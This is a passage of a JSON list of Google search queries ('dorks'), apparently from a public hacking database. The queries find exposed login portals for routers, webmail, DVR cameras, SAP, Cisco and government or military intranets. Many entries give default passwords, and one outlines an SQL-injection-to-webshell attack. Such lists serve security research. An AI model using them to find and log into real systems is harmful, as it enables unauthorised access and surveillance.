SMTP server, POP3 server, finger server, multiple domains, no need for users to have a real system account, SMTP relay checking\", etc..."}, {"dork": "intitle:\"Login to Cacti\"", "description": "Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality."}, {"dork": "\"You have requested access to a restricted area of our website. Please authenticate yourself to continue.\"", "description": "BackgroundEasySite is a Content Management System (CMS) build on PHP and MySQL. Many easysite servers still use the default username and password, however all of them have been contacted about this problem."}, {"dork": "intitle:\"TOPdesk ApplicationServer\"", "description": "Topdesk is some kind of incident ticket system with a webinterface. It requires: Windows 98 and Windows NT, Windows 2000, Windows XP, OS/2. It installs a webserver called: Jetty/4.2.2 and the default password (operator login) is admin/admin. The HTTP server header reveals the OS it's running on."}, {"dork": "intitle:\"Welcome to Mailtraq WebMail\"", "description": "Mailtraq WebMail is just another a web-based e-mail client. This is the login page."}, {"dork": "inurl:\"default/login.php\" intitle:\"kerio\"", "description": "This dork reveals login pages for Kerio Mail server. Kerio MailServer is a state-of-the-art groupware server allowing companies to collaborate via email, shared contacts, shared calendars and tasks. Download can be found here http://www.kerio.com/kms_download.html."}, {"dork": "intitle:phpnews.login", "description": "Vulnerable script auth.php (SQL injection)--- from rst.void.ru ---Possible scenario of attack:[1] log in admin panel, using SQL injection[2] upload PHP file through \"Upload Images\" function (index.php?action=images) and have fun with php shellor edit template (index.php?action=modtemp) and put backdoor code into it.-------------------------http://www.securityfocus.com/bid/14333/infohttp://rst.void.ru/papers/advisory31.txtThe version number may be found sometimes in error messages."}, {"dork": "intitle:communigate pro entrance", "description": "Just reveals the login for Communigate Pro webmail. A brute force attack could be attempted. The directory link from this page can in some instances be used to query user information."}, {"dork": "intitle:\"xams 0.0.0..15 - Login\"", "description": "This is the login for xams it should catch from 0.0.1-0.0.150.0.15 being the latest version as far as I can see their is only versions 0.0.13 0.0.14 and 0.0.15"}, {"dork": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "description": "iCMS - Content Management System...Create dynamic interactive websites in minutes without knowing HTML or web programming. iCMS is a perfect balance of ease of use, flexibility, and power. If you are a Web Developer, you can dramatically decrease your Website development time, decrease your costs and deliver a product that will yield higher profits with less maintenance required!Dont think there are any vulns attached to this"}, {"dork": "\"Powered by Monster Top List\" MTL numrange:200-", "description": "2 Step dork - Change url to add filename \"admin.php\" (just remove index.php&stuff=1&me=2 if you have to) for the admin login.This search finds more pages rather than focusing on the admin login page itself, thus the 2 step dork is more effective."}, {"dork": "\"login prompt\" inurl:GM.cgi", "description": "GreyMatter is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content."}, {"dork": "intitle:\"PHProjekt - login\" login password", "description": "PHProjekt is a group managing software for online calenders, chat, forums, etc. I looked around and i think the default admin login/pass is root/root. Results 1 - 23 of about 851 when i posted this"}, {"dork": "intitle:\"Login Forum Powered By AnyBoard\" intitle:\"If you are a new user:\" intext:\"Forum Powered By AnyBoard\" inurl:gochat -edu", "description": "Anyboard Login Portals. In addition,A vulnerability has been reported in Netbula Anyboard 9.x \"that may allow a remote attacker to gain access to sensitive data. This problem is due to an information disclosure issue that can be triggered by an attacker sending specific HTTP requests to a vulnerable host. This will result in sensitive information about the system being revealed to the attacker.\""}, {"dork": "intitle:\"Admin Login\" \"admin login\" \"blogware\"", "description": "Blogware Login Portal: \"An exciting and innovative tool for creating or enhancing your web presence. It is your key to easy publishing on the World Wide Web \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201c share pictures, video, links, documents, newsletters, opinions and more, with family, friends and colleagues. Now you can have a website without being a Webmaster. It\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2s simple! There is no HTML to learn and no new software to download and install.\""}, {"dork": "\"Please login with admin pass\" -\"leak\" -sourceforge", "description": "PHPsFTPd is a web based administration and configuration interface for the SLimFTPd ftp serverIt can be used an any http server that suports PHP and does not need a database or adittional php modules, only SlimFTPD It allows the administrators of the ftp server to configurate it from within this interface as opposed to its native ascii conf.file It shows statistics about the users that accesed the server , the files that were downloaded , server breakdowns etcAdmin password leak:http://cert.uni-stuttgart.de/archive/bugtraq/2005/07/msg00209.html"}, {"dork": "intitle:\"iDevAffiliate - admin\" -demo", "description": "Affiliate Tracking Software \tAdding affiliate tracking software to your site is one of the most effective ways to achieve more sales and more traffic! Our affiliate software installs in just minutes and integrates easily intoyour existing website."}, {"dork": "intitle:\"Supero Doctor III\" -inurl:supermicro", "description": "\"Supero Doctor III Remote Management\" by Supermicro, Inc.info: http://www.supermicro.es/products/accessories/software/SuperODoctorIII.htmljust look for default password..."}, {"dork": "inurl:ocw_login_username", "description": "WEBppliance is a software application designed to automate the deployment and management of Web-hosting services. There is a bug in how this product does the Logon validation. This Search will take you directly into the Admin pages....U can delete an User....(Plz dont do that..)Enjoy,Night Hacker"}, {"dork": "intitle:\"Docutek ERes - Admin Login\" -edu", "description": "Docutek Eres is software that helps libaries get an internet end to them. This dork finds the admin login in page. Using Docutek Eres you can look through course material amoung other things."}, {"dork": "intitle:\"OnLine Recruitment Program - Login\" -johnny.ihackstuff", "description": "This is the Employer's Interface of eRecruiter, a 100% Paper Less Recruitment Solution implemented by Universal Virtual Office. The only time you need to use paper is when you give out the appointment letter.The access to the Employer's Zone is restricted to authorized users only. Please authenticate your identity."}, {"dork": "\"iCONECT 4.1 :: Login\"", "description": "This search finds the login page for iCONECTnxt, it enables firms to search, organize, and review electronic and document discovery information \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009d including email, native files, and images \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009d from anywhere in the world for easy collaboration with outside counsel, branch offices, and consultants. LAN and Web solutions available."}, {"dork": "\"Powered by Merak Mail Server Software\" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff", "description": "Webmail login portals for Merak Email ServerMerak Email Server Suite consists of multiple awards winner Merak Email Server core and optional components:* Email Server for Windows or Linux* Anti-Spam Protection* Anti-Virus Protection* Integrated WebMail Access* Instant Messaging* GroupWare"}, {"dork": "intitle:\"Merak Mail Server Web Administration\" -ihackstuff.com", "description": "User login pages for Merak Email Server Suite which consists of Merak Email Server core and optional components:* Email Server for Windows or Linux* Anti-Spam Protection* Anti-Virus Protection* Integrated WebMail Access* Instant Messaging* GroupWaremore info: h**p://www.icewarp.com"}, {"dork": "\"This is a restricted Access Server\" \"Javascript Not Enabled!\"|\"Messenger Express\" -edu -ac", "description": "Mostly Login Pages for iPlanet Messenger Express, which is a web-based electronic mail program that enables end users to access their mailboxes using a browser. Messenger Express clients send mail to a specialized web server that is part of iPlanet Messaging Server. Thanks to the forum members for cleaning up the search."}, {"dork": "inurl:webvpn.html \"login\" \"Please enter your\"", "description": "The Cisco WebVPN Services Module is a high-speed, integrated Secure Sockets Layer (SSL) VPN services module for Cisco products."}, {"dork": "\"site info for\" \"Enter Admin Password\"", "description": "This will take you to the cash crusader admin login screen. It is my first google hack.. also try adding index.php at the end, have fun people :)"}, {"dork": "\"intitle:3300 Integrated Communications Platform\" inurl:main.htm", "description": "logon portal to the mitel 330 integrated communications platform.[Mitel\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 3300 Integrated Communications Platform (ICP) provides enterprises with a highly scalable, feature-rich communications system designed to support businesses from 30-60,000 users. ...supporting networking standards such as Q.SIG, DPNSS, and MSDN .... enable their legacy PBX's, ]"}, {"dork": "inurl:ids5web", "description": "EasyAccess Web is a application to view radiological images online.Like in hospitals or universities.Problem is the default administrative login: wadm/wadmBe able to watch sensitive data and images.very bad..."}, {"dork": "inurl:\"/admin/configuration. php?\" Mystore", "description": "simply google inurl trick for Oscommerce for open administrator page.If no .htpassword is set for the admin folder of osCommerce then of course you can change any setting in the shop unless password security has been enabled on the admin console.Despite a few demo pages there are a few open admin pages for webshops.Simple patch if you are one is to place a .htpassword file in the root of the admin folder. -- J.R.Middleton"}, {"dork": "Please enter a valid password! inurl:polladmin", "description": "The PHP Poll Wizard 2 ist a powerful and easy-to-use PHP-Script for creating and managing polls.more generic dork:\"Powered by PHP Poll Wizard\" | intitle:\"php poll wizard\""}, {"dork": "intitle:\"TWIG Login\"", "description": "\"TWIG is a Web-based groupware suite written in PHP, compatible with both PHP3 and PHP4. Its features include IMAP and POP3 email, Usenet newsgroups, contact management, scheduling, shared notes and bookmarks, a todo list, and meeting announcements.\""}, {"dork": "intitle:IMP inurl:imp/index.php3", "description": "Webmail Login pages for IMP\"IMP is a set of PHP scripts that implement an IMAP based webmail system. Assuming you have an account on a server that supports IMAP, you can use an installation of IMP to check your mail from anywhere that you have web access.\""}, {"dork": "intitle:\"SHOUTcast Administrator\" inurl:admin.cgi", "description": "Login pages for SHOUTcast\"SHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts. \""}, {"dork": "(intitle:\"WmSC e-Cart Administration\")|(intitle:\"WebMyStyle e-Cart Administration\")", "description": "Login Pages for WebMyStyle.\"WebMyStyle offers a full range of web hosting and dedicated server plans, but also gives you the ability to pick and choose the features that you need for your web sites.\""}, {"dork": "intitle:\"eXist Database Administration\" -demo", "description": "Login Pages \"eXist is an Open Source native XML database featuring efficient, index-based XQuery processing, automatic indexing, extensions for full-text search, XUpdate support and tight integration with existing XML development tools. The database implements the current XQuery 1.0 working draft as of November, 2003 (for the core syntax, some details already following later versions), with the exception of the XML schema related features.\""}, {"dork": "FlashChat v4.5.7", "description": "This simple search brings up lots of online Flash Chat clients. Flash Chat's administration directory is always found by visiting /admin in the URL. Example: www.webaddress.com/flashChat/admin/The default Admin password is \"adminpass\" (Without the speech marks)."}, {"dork": "intitle:Ampache intitle:\"love of music\" password | login | \"Remember Me.\" -welcome", "description": "Ampache is a Web-based MP3/Ogg/RM/Flac/WMA/M4A manager. It allows you to view, edit, and play your audio files via HTTP/IceCast/Mpd or Moosic. It has support for downsampling, playlists, artist, and album views, album art, random play, song play tracking, user themes, and remote catalogs using XML-RPC."}, {"dork": "\"SurgeMAIL\" inurl:/cgi/user.cgi ext:cgi", "description": "surgemail is an email server from netwinsite.com that can be accessed by a web browser. This dork finds the web logins."}, {"dork": "inurl:+:8443/login.php3", "description": "Plesk is a multi platform control panel solution for hosting.More information: hxxp://www.swsoft.com/plesk/Vulnerability: PLESK 7.5 Reload (and lower) & PLESK 7.6 for M$ Windows path passing and disclosure] Discovered By: GuanYu"}, {"dork": "inurl:\"/?pagename=AdministratorLogin\"", "description": "Powered by Bariatric AdvantageAdmin Login:Admin login pages for what looks like an inhouse eshop. No obvious public exploits but I'm sure there is a way WinkMore info found here:h**p://catalinalifesciences.com/ Credit to cp for the clean up"}, {"dork": "inurl:\"/?pagename=CustomerLogin\"", "description": "Customer login pages for what looks like an inhouse eshop. More information here:h**p://catalinalifesciences.com/ Credit to cp for clean up."}, {"dork": "intitle:\"AdventNet ManageEngine ServiceDesk Plus\" intext:\"Remember Me\"", "description": "serviceDesk Plus is a 100 % web-based Help Desk and Asset Management software.vendor: h**p://manageengine.adventnet.com/products/service-desk/index.htmlmanual: h**p://manageengine.adventnet.com/products/service-desk/help/adminguide/index.html"}, {"dork": "||Powered by [ClipBucket 2.0.91]", "description": "This search identifies clpbpucket installations. They frequently have an admin/admin default password on the administrative backend located at: http://server/admin_area/login.php .\nAuthor: Zhran Team"}, {"dork": "intitle:\"cascade server\" inurl:login.act", "description": "Search for login screen of default instance: Cascade Server CMS by Hannon Author: Erik Horton"}, {"dork": "intitle:\"Enabling Self-Service Procurement\"", "description": "Search for login screen of default instance: Puridiom (A Procurement Web\nApplication)"}, {"dork": "intitle:\"cyber recruiter\" \"User ID\"", "description": "Search for login screen of default instance: Cyber Recruiter (applicant\ntracking and recruiting software)"}, {"dork": "\"mailing list memberships reminder\"", "description": "Hi,\nBy default, while subscribing to a mailing list on a website, running\nMailman (GNU) for mailing list management, the user has got options to\nmanage his/her subscription options.\nThere is an option of getting password reminder email for this list\nonce in a month.\nAnd, by default, this option is set to Yes.\nAlong with sending the password reminder mail in *plain text* to the\nusers, it gets archived on the sites too.\nThanks,\nSagar Belure"}, {"dork": "inurl:\"cgi-bin/webcgi/main\"", "description": "inurl:\"cgi-bin/webcgi/main\"\nThis dork finds indexed public facing Dell Remote Access Card.\n-n17r0u6"}, {"dork": "inurl:/app_dev.php/login \"Environment\"", "description": "Search for login screen in web aplications developed with Symfony2 in a development environment\nDaniel Maldonado\nhttp://caceriadespammers.com.ar"}, {"dork": "intitle:\"Log In\" \"Access unsecured content without logging in\"", "description": "iOmega Storcenter login page:\nintitle:\"Log In\" \"Access unsecured content without logging in\"\nGreetings,\nAlrik"}, {"dork": "intitle:\"DVR+Web+Client\"", "description": "This dork will find most Linux-based DVR web clients that are accessible to\nthe web and through SSH. Linux-based DVR web clients are login portals for\nsurveillance web cameras wherein you can spy in other peoples cameras.\n*Default Usernames:* admin, guest, root\n*Default Passwords:* admin, guest, root\n*Author:* shipcode"}, {"dork": "inurl:\"InfoViewApp/logon.jsp\"", "description": "Google Hacking\n*SAP Business Object 3.1 XI*\ninurl:\"InfoViewApp/logon.jsp\"\ntwitter\n@firebitsbr"}, {"dork": "site:login.*.*", "description": "DORK:site:login.*.*\nDescription: Allow User To View\nLogin Panel Of Many WebSites..\nAuthor:MTK\nDATED: 13-1-1"}, {"dork": "intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx", "description": "Category : Pages containing login portals\nDescription : Dork for finding sensitive login portals\nDork : intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx\nLink : https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&oq=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&gs_l=hp.3...852.852.0.983.1.1.0.0.0.0.121.121.0j1.1.0...0.0...1c.1.7.psy-ab.664iAsY450k&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.d2k&fp=7b93b16efbccc178&biw=1362&bih=667 \nDate : 20/3/2013\nExploit Author: Scott Sturrock\nEmail: f00bar'at'linuxmail'dot'org"}, {"dork": "intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx", "description": "Category : Pages containing login portals\nDescription : Dork for finding government login portals\nDork : intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx\nLink : https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&oq=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&gs_l=hp.3...894.894.0.1059.1.1.0.0.0.0.116.116.0j1.1.0...0.0...1c.1.7.psy-ab.lvawmQ4rKqA&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.d2k&fp=7b93b16efbccc178&biw=1362&bih=667 \nDate : 20/3/2013\nAuthor : Scott Sturrock\nEmail: f00bar'at'linuxmail'dot'org"}, {"dork": "intext:Computer Misuse Act inurl:login.aspx", "description": "Category : Pages containing login portals\nDescription : Dork for finding sensitive login portals\nDork : intext:Computer Misuse Act inurl:login.aspx\nLink : https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&oq=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&gs_l=hp.3...1565.1565.0.1684.1.1.0.0.0.0.105.105.0j1.1.0...0.0...1c.1.7.psy-ab.ZaZN16Ureds&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.ZWU&fp=7b93b16efbccc178&biw=1362&bih=667 \nDate : 20/3/2013\nAuthor : Scott Sturrock\nEmail: f00bar'at'linuxmail'dot'org"}, {"dork": "Serv-U (c) Copyright 1995-2013 Rhino Software, Inc. All Rights.Reserved.", "description": "# Category: FTP Login Portals\n# Description : Dork for finding FTP Login portals\n# Google Dork: Serv-U \ufffd Copyright 1995-2013 Rhino Software, Inc. All\nRights.Reserved.\n# Date: 16/04/2013\n# Exploit Author: Arul Kumar.V\n# Vendor Homepage: www.serv-u.com\n# Email : hackerarul@gmail.com\nThank you"}, {"dork": "inurl:\"dasdec/dasdec.csp\"", "description": "inurl:\"dasdec/dasdec.csp\"\nDASDEC II Emergency Alert System\nUser Manual: http://www.digitalalertsystems.com/pdf/DASDEC_II_manual.pdf\nDefault username: Admin\nDefault password: dasdec"}, {"dork": "intitle:\"Cisco Integrated Management Controller Login\"", "description": "intitle:\"Cisco Integrated Management Controller Login\"\nThe Cisco Integrated Management Controller (CIMC) is the management service\nfor the C-Series servers. CIMC is built into the motherboard. This Google\ndork searches for the CIMC GUI login portal for remote access.\nax_"}, {"dork": "inurl:/secure/Dashboard.jspa intitle:\"System Dashboard\"", "description": "Finds login pages and system dashboards for Atlassian's JIRA.\n- Andy G - twitter.com/vxhex"}, {"dork": "intitle:\".:: Welcome to the Web-Based Configurator::.\" & intext:\"Welcome to your router Configuration Interface\"", "description": "#Summary: ZyXEL router login portal\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7\nNOTE:\ncurrently exists this -> https://www.exploit-db.com/ghdb/270/ but only shows\n8 results against 63100 that i sent, also covers more models."}, {"dork": "intext:\"I'm using a public or shared computer\" & intext:\"Remote Web Workplace\"", "description": "#Summary: Windows Business Server 2003 Login portal\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7"}, {"dork": "inurl:\"/secure/login.aspx\"", "description": "#Summary: Several Web Pages Login Portal\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"Comrex ACCESS Rack\"", "description": "IP Codecs offering \"studio quality audio and video over wired and\nwireless IP circuits\". Used in studio-grade radio broadcasting over the\nweb. More product information here: http://www.comrex.com/products.html.\nThis Google search will return (some, but not hundreds of) web-facing\nlogin portals for this type of device. Requires JavaScript and Flash for\nviewer to work. Default login: comrex comrex.\n4N6 Security"}, {"dork": "allinurl:\"owa/auth/logon.aspx\" -google -github", "description": "[+] Description - Find OWA login portals\nRegards,\nnecrodamus\nhttp://www.twitter.com/necrodamus2600"}, {"dork": "\"inurl:/data/nanoadmin.php\"", "description": "Hi,\nI would like to submit this GHDB which allow to find out nanoCMS\nadministration pages :\n*inurl:\"/data/nanoadmin.php\"*\nBest regards,\nAntonino Napoli"}, {"dork": "inurl:/administrator/index.php?autologin=1", "description": "Title: google hacking username and password of joomla\nGoogle Dork: inurl:/administrator/index.php?autologin=1\nDate: 2013-11-30\nAuthor: Ashiyane Digital Security Team\nSoftware Link: www.joomla.org/\nVersion: joomla 2.5\nLocation: /administrator/index.php?autologin=1&passwd=[password]&username=[username]"}, {"dork": "allinurl:\"/main/auth/profile.php\" -github -google", "description": "[+] This dork will help you find Chamilo login portals. Depending on the\nversion, the site could be vulnerable to SQL injection.\nSee Here-\nhttps://www.exploit-db.com/exploits/30012/\nRegards,\nnecrodamus\nhttp://www.twitter.com/necrodamus2600"}, {"dork": "allinurl:\"zimbra/?zinitmode=http\" -google -github", "description": "zimbra webmail login page lookup\nallinurl:\"zimbra/?zinitmode=http\" -google -github\n-- \n-----------------------------------------------------------------\n*|JJohnny *RANDRIAMAMPIONONA |\n| Phone: (+261) 33 08 003 61 |\n| NSS Engineer | IS Security Enthusiast |\n| |----------------------------------------------------------------|"}, {"dork": "inurl:\"Citrix/XenApp/auth/login.aspx\"", "description": "Finds login portals for Citrix XenApp.\n- Andy G - twitter.com/vxhex"}, {"dork": "intitle:\"virtual office\" sonicwall domain", "description": "Network or vulnerability data\nIP address AD Domain NameLogin entry/method for internal network"}, {"dork": "intitle:FRITZ!Box inurl:login.lua", "description": "Show open FritzBox-Router with\nintitle:FRITZ!Box inurl:login.lua"}, {"dork": "inurl:logon.html \"CSCOE\"", "description": "Pages containing login portals - Web Server Detection \nFinds logins portals for Cisco ASA Clientless Webvpn\ninurl:logon.html \"CSCOE\""}, {"dork": "intext:\"Please Authenticate\" intitle:Peakflow", "description": "Pages containing login portals - Web Server Detection\nFinds Login portals for Arbor Peakflow (Anti-DDoS System)\nTwitter - @libborius"}, {"dork": "intitle:\"InterWorx-CP\" \"Forgot your password\"", "description": "InterWorx Web Hosting Control Panel login pages.\n- Andy G - twitter.com/vxhex"}, {"dork": "site:.mil + inurl:login.aspx | .asp | .html | .php | .htm", "description": "*Google Search : site:.mil + inurl:login.aspx | .asp | .html | .php | .htm\nZeel Chavda"}, {"dork": "intitle:Logon OrderCloud ui/logon.aspx", "description": "Four51 OrderCloud Company cloud software.\nOrderCloud for shopping websites Login.\n-Xploit"}, {"dork": "inurl:\"/wap/LoginPolicy.jsp\"", "description": "Stoneware webnetwork Cloud \nAllows for Portal Cloud login.\n-Xploit"}, {"dork": "inurl:\"remote.php/webdav\" -site:owncloud.org", "description": "Category: Pages Containin Login Portals\nAuthor: Felipe Molina (@femoltor)\nOwncloud WebDav login"}, {"dork": "inurl:imapuser Mail :: Welcome to Horde imp login.php password", "description": "Mail :: Welcome to Horde\nGives usernames on Horde email websites and other email websites as well.\n-Xploit"}, {"dork": "inurl:agc/vicidial.php", "description": "This reveals the version of vicidial used and gives the access changing to\n/agc/vicidial.php to vicidial/admin.php to give the direct access to admin\nlogin page ."}, {"dork": "inurl:webgps intitle:\"GPS Monitoring System\"", "description": "Login page for GPS monitoring systems.\nAuthor: Manuel Mancera (sinkmanu)"}, {"dork": "inurl:/cgi-bin/MANGA/index.cgi", "description": "Description: This dork can access many login portal of big companies systems ( use this wisely. )\nBy Sivabalan ( CYBER GENIUS ).."}, {"dork": "inurl:/weblogin.aspx", "description": "inurl:/weblogin.aspx\nDescription : This google dork can access can access many login portals...\nBY Sivabalan ( CYBER GENIUS ).."}, {"dork": "inurl:/tmui/login.jsp", "description": "Administrative Panel Web F5 BIG-IP appliances\ninurl:/tmui/login.jsp\n@firebitsbr"}, {"dork": "inurl:intranet -intext:intranet", "description": "This Dork show millions of access to intranet pages.\nDork by Rootkit Pentester.\nRegards."}, {"dork": "Site:www.comune.*.*.* inurl:login", "description": "# Exploit Title: Dork to find Comune Websites.\n# Google Dork: site:www.comune.*.*.* inurl:login\n# Description : Finds out login portals to Comune Websites.\n# Date: 27/01/2016\n# Author: XDarkCoder"}, {"dork": "inurl:/AirWatch/Login?", "description": "AirWatch Company.\nLogin/Trouble Logging In/ Back to Login Page / Don't remember your Username Login \"Errors\"\n-Xploit"}, {"dork": "site:www.tribunale.*.*.* inurl:login", "description": "# Exploit Title: Dork to find Tribunale Websites.\n# Google Dork: site:www.tribunale.*.*.* inurl:login\n# Description : Finds out login portals on Tribunale Websites. Gov related\n# Date: 07/02/2016\n# Exploit Author: XDarkCoder"}, {"dork": "inurl:login.do intext:government", "description": "# Exploit Title: Dork to find Government and Military website access\nportals.\n# Google Dork: inurl:login.do intext:government\n# Description : Finds out login access portals to Military and Government\nSystems. Enjoy.\n# Date: 09/02/2016\n# Exploit Author: XDarkCoder"}, {"dork": "inurl:intranet site:www.*.gov", "description": "# Exploit Title: inurl:intranet site:www.*.gov\n# Google Dork: inurl:intranet site:www.*.gov\n# Description : Dork to find login portal access to intranet systems\non government websites.\n# Date: 09/02/2016\n# Exploit Author: XDarkCoder"}, {"dork": "inurl:/AT-admin.cgi? intitle:login | private | employee | intranet | admin", "description": "inurl:/AT-admin.cgi? intitle:login | private | employee | intranet | admin\nPages containing login portals\nBruno Schmid"}, {"dork": "intitle:\"Helm : The Web Hosting Control System\"", "description": "Description: Helm Control Panel login page\nGoogle search: intitle:\"Helm : The Web Hosting Control System\"\nAutor: nebo_oben"}, {"dork": "intitle:\"FirstSpirit - login\"", "description": "Description: FirstSpirit Content Management System login page\nGoogle search: intitle:\"FirstSpirit - login\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"D-Link VoIP Router\" \"Welcome\"", "description": "Description: D-Link VoIP Router login page\nGoogle search: intitle:\"D-Link VoIP Router\" \"Welcome\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"ASUS Login\" \"SIGN IN\"", "description": "Description: ASUS router login page\nGoogle search: intitle:\"ASUS Login\" \"SIGN IN\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"8000\" inurl:\"login\"", "description": "Login forms. Mostly ftp.\nGoogle dork:\ninurl:\"8000\" inurl:\"login\"\nD0bby"}, {"dork": "intitle:\"DirectAdmin Login\" \"Please enter your Username and Password\"", "description": "Description: DirectAdmin Web Control Panel login page\nGoogle search: intitle:\"DirectAdmin Login\" \"Please enter your Username\nand Password\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"login.php?action=recover\"", "description": "Description: Password recovery forms\nGoogle search: inurl:\"login.php?action=recover\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"sap-system-login\"", "description": "Description: SAP Web Application Server login page\nGoogle search: inurl:\"sap-system-login\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"sap/hrrcf_a_startpage_ext_cand\" | inurl:\"sap/hrrcf_a_pw_via_email_extern\"", "description": "Description: SAP Web Application Server login page\nGoogle search: inurl:\"sap/hrrcf_a_startpage_ext_cand\" |\ninurl:\"sap/hrrcf_a_pw_via_email_extern\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"Logon - SAP Web Application Server\"", "description": "Description: SAP Web Application Server login page\nGoogle search: intitle:\"Logon - SAP Web Application Server\"\nAuthor: nebo_oben"}, {"dork": "intext:\"2016 SAP AG. All rights reserved.\" intitle:\"Logon\"", "description": "Description: SAP Web Application Server login page\nGoogle search: intext:\"2016 SAP AG. All rights reserved.\" intitle:\"Logon\"\nAuthor: nebo_oben"}, {"dork": "intext:\"Powered by net2ftp\"", "description": "Description: Web based FTP client login page\nGoogle search: intext:\"Powered by net2ftp\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"Login\" intext:\"Use Web Messaging Lite\"", "description": "Description: Webmail login page\nGoogle search: intitle:\"Login\" intext:\"Use Web Messaging Lite\"\nAuthor: nebo_oben"}, {"dork": "intext:\"2008\" intext:\"OpenERP SA\" intitle:\"Login\"", "description": "Description: OpenERP login page\nGoogle search: intext:\"2008\" intext:\"OpenERP SA\" intitle:\"Login\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"mikrotik routeros > administration\" intext:\"mikrotik routeros\" intext:\"configuration page\" -demo intext:\"Mikrotik, RouterOS and the Mikrotik logo are registered trademarks of Mikrotikls SIA\"", "description": "Description: MikroTik RouterOS configuration & login page\nGoogle search: intitle:\"mikrotik routeros > administration\"\nintext:\"mikrotik routeros\" intext:\"configuration page\" -demo\nintext:\"Mikrotik, RouterOS and the Mikrotik logo are registered\ntrademarks of Mikrotikls SIA\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"RouterOS\" intitle:\"configuration page\" intext:\"You have connected to a router. Administrative access only.\"", "description": "Description: RouterOS configuration & login page\nGoogle search: intitle:\"RouterOS\" intitle:\"configuration page\"\nintext:\"You have connected to a router. Administrative access only.\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"Honeywell XL Web Controller - Login\" (inurl:\"standard/default.php\" | inurl:\"standard/header/header.php\" | inurl:\"standard/mainframe.php\" | inurl:\"standard/footer/footer.php\" | inurl:\"standard/update.php\")", "description": "Description: Honeywell XL Web Controller login page\nGoogle search: intitle:\"Honeywell XL Web Controller - Login\"\n(inurl:\"standard/default.php\" | inurl:\"standard/header/header.php\" |\ninurl:\"standard/mainframe.php\" | inurl:\"standard/footer/footer.php\" |\ninurl:\"standard/update.php\")\nAuthor: nebo_oben"}, {"dork": "intitle:\"Openbravo\" (inurl:\"openbravo/security/Login_FS.html\" | inurl:\"openbravo/security/Login_Welcome.html\" | inurl:\"openbravo/security/Login_F1.html\" | inurl:\"openbravo/security/Login_F0.html\")", "description": "Description: Openbravo login page\nGoogle search: intitle:\"Openbravo\"\n(inurl:\"openbravo/security/Login_FS.html\" |\ninurl:\"openbravo/security/Login_Welcome.html\" |\ninurl:\"openbravo/security/Login_F1.html\" |\ninurl:\"openbravo/security/Login_F0.html\")\nAuthor: nebo_oben"}, {"dork": "inurl:/sap/bc/webdynpro/sap/ | \"sap-system-login-oninputprocessing\"", "description": "Logon - SAP Web Application Server and Job Search: inurl:/sap/bc/webdynpro/sap/ | \"sap-system-login-oninputprocessing\"\nSAP Web Application Server Password Reset: inurl:/sap/bc/webdynpro/sap/ | \"ysccwa_password_reset?sap-client\"\n-Xploit"}, {"dork": "intitle:\"Login Page\" intext:\"Phone Adapter Configuration Utility\"", "description": "Various online Cisco VOIP devices (SPA 112)! More info:\nhttp://www.cisco.com/\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br"}, {"dork": "intitle:vood act=index Gateway >Login", "description": "More VOOD Online Gateway Logins\ninurl:/vood/cgi-bin/vood_view.cgi?act=index\n-Xploit"}, {"dork": "filetype:asp intitle:\" Microsoft Outlook Web Access\"", "description": "Dork who get access to 